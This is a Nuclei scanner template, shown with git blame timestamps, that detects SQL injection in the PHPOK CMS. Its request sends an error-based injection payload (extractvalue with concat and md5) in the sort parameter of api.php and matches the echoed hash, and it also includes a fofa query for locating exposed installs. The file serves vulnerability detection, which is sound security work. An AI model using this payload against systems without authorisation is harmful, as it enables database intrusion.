nuclei-templates/vulnerabilities/other/phpok-sqli.yaml

26 lines
488 B
YAML
Raw Normal View History

2022-06-05 08:31:28 +00:00
id: phpok-sqli
info:
2022-06-05 11:39:00 +00:00
name: PHPOK - Sql Injection
2022-06-05 08:31:28 +00:00
author: ritikchaddha
severity: high
metadata:
2022-06-30 03:01:16 +00:00
verified: true
2022-06-05 08:36:26 +00:00
fofa-query: app="phpok"
2022-06-05 08:31:28 +00:00
tags: phpok,sqli
2022-06-30 03:01:16 +00:00
variables:
num: "999999999"
2022-06-05 08:31:28 +00:00
requests:
- method: GET
path:
2022-06-30 03:01:16 +00:00
- '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'
2022-06-05 08:31:28 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-06-30 03:01:16 +00:00
- '{{md5({{num}})}}'